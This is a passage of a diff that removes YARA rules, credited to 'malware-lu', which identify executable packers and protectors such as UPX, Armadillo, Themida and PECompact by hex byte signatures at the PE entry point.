-	$a1 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 0F C0 C9 D2 D1 0F C1 C0 D3 DA C0 D6 A8 EB 01 DE D0 EC 0F C1 CB D0 CF 0F C1 D1 D2 DB 0F C8 EB 01 BC C0 E9 C6 C1 D0 91 0F CB EB 01 73 0F CA 87 D9 87 D2 D0 CF 87 D9 0F C8 EB 01 C1 EB 01 A2 86 CA D0 E1 0F C0 CB 0F CA C0 C7 91 0F CB C1 D9 0C 86 F9 86 D7 D1 D9 EB 01 A5 EB 01 11 EB 01 1D 0F C1 C2 0F CB 0F C1 C2 EB 01 A1 C0 E9 FD 0F C1 D1 EB 01 E3 0F CA 87 D9 EB 01 F3 0F CB 87 C2 0F C0 F9 D0 F7 EB 01 2F 0F C9 C0 DC C4 EB 01 35 0F CA D3 D1 86 C8 EB 01 01 0F C0 F5 87 C8 D0 DE EB 01 95 EB 01 E1 EB 01 FD EB 01 EC 87 D3 0F CB C1 DB 35 D3 E2 0F C8 86 E2 86 EC C1 FB 12 D2 EE 0F C9 D2 F6 0F CA 87 C3 C1 D3 B3 EB 01 BF D1 CB 87 C9 0F CA 0F C1 DB EB 01 44 C0 CA F2 0F C1 D1 0F CB EB 01 D3 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule Upackv039finalDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 56 10 E2 E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 }
-	$a1 = { FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule vprotector12vcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 }
-	$a1 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 00 00 00 EB E6 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 E8 05 00 00 00 0F 01 EB 05 E8 EB FB 00 00 83 C4 04 E8 08 00 00 00 0F 01 83 C0 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule FakeNinjav28Spirit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? ?? ?? FF E2 64 11 40 00 FF 35 84 11 40 00 E8 40 }
-
-condition:
-		$a0
-}
-	
-	
-rule PECompactv133
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 00 80 40 ?? 90 90 01 85 9E 80 40 ?? BB E8 0E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DragonArmorOrient
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF 4C ?? ?? 00 83 C9 FF 33 C0 68 34 ?? ?? 00 F2 AE F7 D1 49 51 68 4C ?? ?? 00 E8 11 0A 00 00 83 C4 0C 68 4C ?? ?? 00 FF 15 00 ?? ?? 00 8B F0 BF 4C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 BF 4C ?? ?? 00 8B D1 68 34 ?? ?? 00 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA BF 5C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 51 68 5C ?? ?? 00 E8 C0 09 00 00 8B 1D 04 ?? ?? 00 83 C4 0C 68 5C ?? ?? 00 56 FF D3 A3 D4 ?? ?? 00 BF 5C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 BF 5C ?? ?? 00 8B D1 68 34 ?? ?? 00 C1 E9 02 F3 AB 8B CA 83 E1 }
-
-condition:
-		$a0
-}
-	
-	
-rule ThemidaWinLicenseV1802OreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftDefender1xRandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD 00 59 9C 50 74 0A 75 08 E8 59 C2 04 00 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 E6 01 00 00 03 C8 74 BD 75 BB E8 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PellesC2x4xDLLPelleOrinius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPX290LZMADelphistubMarkusOberhumerLaszloMolnarJohnReiser
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV119aPlib043ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 3C 04 00 00 EB 0C 8B 85 38 04 00 00 89 85 3C 04 00 00 8D B5 60 04 00 00 8D 9D EB 02 00 00 33 FF E8 52 01 00 00 EB 1B 8B 85 3C 04 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 48 04 00 00 00 74 0E 83 BD 4C 04 00 00 00 74 05 E8 B8 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 D1 03 00 00 89 85 5C 04 00 00 5B FF B5 5C 04 00 00 56 FF D3 83 C4 08 8B B5 5C 04 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 E9 94 00 00 00 56 FF 95 C9 03 00 00 85 C0 0F 84 B4 00 00 00 89 85 54 04 00 00 8B C6 EB 5B 8B 85 58 04 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 58 04 00 00 C7 00 20 20 20 00 EB 06 FF B5 58 04 00 00 FF B5 54 04 00 00 FF 95 CD 03 00 00 85 C0 74 71 89 07 83 C7 04 8B 85 58 04 00 00 EB 01 40 80 38 00 75 FA 40 89 85 58 04 00 00 66 81 78 02 00 80 74 A5 80 38 00 75 A0 EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 80 3E 01 0F 85 63 FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 5C 04 00 00 FF 95 D5 03 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VirogensPEShrinkerv014
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 55 E8 ?? ?? ?? ?? 87 D5 5D 60 87 D5 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 57 56 AD 0B C0 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtBorlandDelphiBorlandC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 }
-	$a1 = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }
-	$a2 = { EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01ACProtect109Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 02 00 00 90 90 90 04 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorV16dVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv032BetaPatchDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 ?? ?? AD 50 ?? AD 91 F3 A5 }
-
-condition:
-		$a0
-}
-	
-	
-rule Apex30alpha500mhz
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5F B9 14 00 00 00 51 BE 00 10 40 00 B9 00 ?? ?? 00 8A 07 30 06 46 E2 FB 47 59 E2 EA 68 ?? ?? ?? 00 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule SimbiOZPoly21Extranger
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 50 8B C4 83 C0 04 C7 00 ?? ?? ?? ?? 58 C3 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov184
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 E8 C1 40 00 68 F4 86 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov183
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 64 84 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov182
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 74 81 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov180
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 E8 C1 00 00 68 F4 86 00 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeSplitter13SplitMethodBillPrisonerTPOC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5D 81 ED 08 12 40 00 E8 66 FE FF FF 55 50 8D 9D 81 11 40 00 53 8D 9D 21 11 40 00 53 6A 08 E8 76 FF FF FF 6A 40 68 00 30 00 00 68 00 01 00 00 6A 00 FF 95 89 11 40 00 89 85 61 10 40 00 50 68 00 01 00 00 FF 95 85 11 40 00 8D 85 65 10 40 00 50 FF B5 61 10 40 00 FF 95 8D 11 40 00 6A 00 68 80 00 00 00 6A 02 6A 00 ?? ?? ?? ?? 01 1F 00 FF B5 61 10 40 00 FF 95 91 11 40 00 89 85 72 10 40 00 6A 00 8D ?? ?? ?? ?? 00 50 FF B5 09 10 40 00 8D 85 F5 12 40 00 50 FF B5 72 10 40 00 FF 95 95 11 40 00 FF B5 72 10 40 00 FF 95 99 11 40 00 8D 85 0D 10 40 00 50 8D 85 1D 10 40 00 50 B9 07 00 00 00 6A 00 E2 FC }
-	$a1 = { E9 FE 01 00 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 76 63 45 72 30 31 31 2E 74 6D 70 00 00 00 00 00 00 00 00 00 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 85 C0 0F 84 5F 02 00 00 8B 48 30 80 39 6B 74 07 80 39 4B 74 02 EB E7 80 79 0C 33 74 02 EB DF 8B 40 18 C3 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule RJoiner12aVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 0C 01 00 00 8D 85 F4 FE FF FF 56 50 68 04 01 00 00 FF 15 0C 10 40 00 94 90 94 8D 85 F4 FE FF FF 50 FF 15 08 10 40 00 94 90 94 BE 00 20 40 00 94 90 94 83 3E FF 74 7D 53 57 33 DB 8D 7E 04 94 90 94 53 68 80 00 00 00 6A 02 53 6A 01 68 00 00 00 C0 57 FF 15 04 10 40 00 89 45 F8 94 90 94 8B 06 8D 74 06 04 94 90 94 8D 45 FC 53 50 8D 46 04 FF 36 50 FF 75 F8 FF 15 00 10 40 00 94 90 94 FF 75 F8 FF 15 10 10 40 00 94 90 94 8D 85 F4 FE FF FF 6A 0A 50 53 57 68 20 10 40 00 53 FF 15 18 10 40 00 94 90 94 8B 06 8D 74 06 04 94 90 94 83 3E FF 75 89 5F 5B 33 C0 5E C9 C2 10 00 CC CC 24 11 }
-
-condition:
-		$a0
-}
-	
-	
-rule VxVirusConstructorIVPbased
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? E8 ?? ?? 5D ?? ?? ?? ?? ?? 81 ED ?? ?? ?? ?? ?? ?? E8 ?? ?? 81 FC ?? ?? ?? ?? 8D ?? ?? ?? BF ?? ?? 57 A4 A5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EncryptPE12003518WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv168v184
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 7B 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SDProtectorProEdition116RandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 18 33 C0 89 41 04 89 41 }
-	$a1 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 18 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 93 03 00 00 03 C8 74 C4 75 C2 E8 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Reg2Exe222223byJanVorel
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 00 E8 2F 1E 00 00 A3 C4 35 40 00 E8 2B 1E 00 00 6A 0A 50 6A 00 FF 35 C4 35 40 00 E8 07 00 00 00 50 E8 1B 1E 00 00 CC 68 48 00 00 00 68 00 00 00 00 68 C8 35 40 00 E8 76 16 00 00 83 C4 0C 8B 44 24 04 A3 CC 35 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 EC 1D 00 00 A3 C8 35 40 00 E8 62 1D 00 00 E8 92 1A 00 00 E8 80 16 00 00 E8 13 14 00 00 68 01 00 00 00 68 08 36 40 00 68 00 00 00 00 8B 15 08 36 40 00 E8 71 3F 00 00 B8 00 00 10 00 BB 01 00 00 00 E8 82 3F 00 00 FF 35 48 31 40 00 B8 00 01 00 00 E8 0D 13 00 00 8D 0D EC 35 40 00 5A E8 F2 13 00 00 68 00 01 00 00 FF 35 EC 35 40 00 E8 84 1D 00 00 A3 F4 35 40 00 FF 35 48 31 40 00 FF 35 F4 35 40 00 FF 35 EC 35 40 00 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv120EngdulekxtBorlandDelphiMicrosoftVisualC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrunchPE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CICompressv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 04 68 00 10 00 00 FF 35 9C 14 40 00 6A 00 FF 15 38 10 40 00 A3 FC 10 40 00 97 BE 00 20 40 00 E8 71 00 00 00 3B 05 9C 14 40 00 75 61 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 68 94 10 40 00 FF 15 2C 10 40 00 A3 F8 10 40 00 6A 00 68 F4 10 40 00 FF 35 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeShieldv27b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 40 85 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 87 DD 8B 85 E6 90 40 00 01 85 33 90 40 00 66 C7 85 30 90 40 00 90 90 01 85 DA 90 40 00 01 85 DE 90 40 00 01 85 E2 90 40 00 BB 7B 11 00 00 03 9D EA 90 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXInlinerv10byGPcH
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }
-
-condition:
-		$a0
-}
-	
-	
-rule PKLITEv114v120
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 09 BA ?? ?? CD 21 CD 20 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeToolsCOM2EXE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5D 83 ED ?? 8C DA 2E 89 96 ?? ?? 83 C2 ?? 8E DA 8E C2 2E 01 96 ?? ?? 60 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallEmbedded2545Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 F2 FF FF FF 50 68 ?? ?? ?? ?? 68 40 1B 00 00 E8 42 FF FF FF E9 9D FF FF FF 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxARCV4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 5D 81 ED 06 01 81 FC 4F 50 74 0B 8D B6 86 01 BF 00 01 57 A4 EB 11 1E 06 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillo3X5XSiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 60 33 C9 75 02 EB 15 EB 33 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakePESHiELD025emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 2B 00 00 00 0D 0A 0D 0A 0D 0A 52 65 67 69 73 74 41 72 65 64 20 74 6F 3A 20 4E 4F 4E 2D 43 4F 4D 4D 45 52 43 49 41 4C 21 21 0D 0A 0D 0A 0D 00 58 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov252beta2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? B0 ?? ?? ?? ?? 68 60 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 24 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CipherWallSelfExtratorDecryptorConsolev15
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 0B 6E 5B 9B 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCShrinkerv029
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BD ?? ?? ?? ?? 01 AD 55 39 40 ?? 8D B5 35 39 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPacKV33LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 00 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CopyMinderMicrocosmLtd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 25 ?? ?? ?? ?? EF 6A 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Crunchv5BitArts
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 15 03 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 FC 07 00 00 89 85 E8 07 00 00 FF 74 24 2C E8 20 02 00 00 0F 82 94 06 00 00 E8 F3 04 00 00 49 0F 88 88 06 00 00 8B B5 E8 07 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCShrinkerv020
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 E8 01 ?? ?? 60 01 AD B3 27 40 ?? 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillo500SiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
